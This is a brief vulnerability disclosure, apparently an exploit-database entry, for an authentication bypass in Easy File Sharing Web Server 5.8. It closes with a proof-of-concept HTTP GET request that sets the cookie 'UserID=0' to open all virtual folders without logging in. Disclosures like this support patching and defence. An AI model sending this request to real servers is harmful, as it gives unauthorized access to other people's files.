------------------------------------------------------------------------
Software................Easy File Sharing Web Server Version 5.8
Vulnerability...........Authentication Bypass
Threat Level............Serious (3/5)
Download................http://www.sharing-file.com/
Disclosure Date.........4/6/2011
Tested On...............Windows Vista
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

If the UserID cookie is set all virtual folders become accessible.


--PoC--

GET http://localhost/[Virtual Folder] HTTP/1.1
Host: localhost
Cookie: UserID=0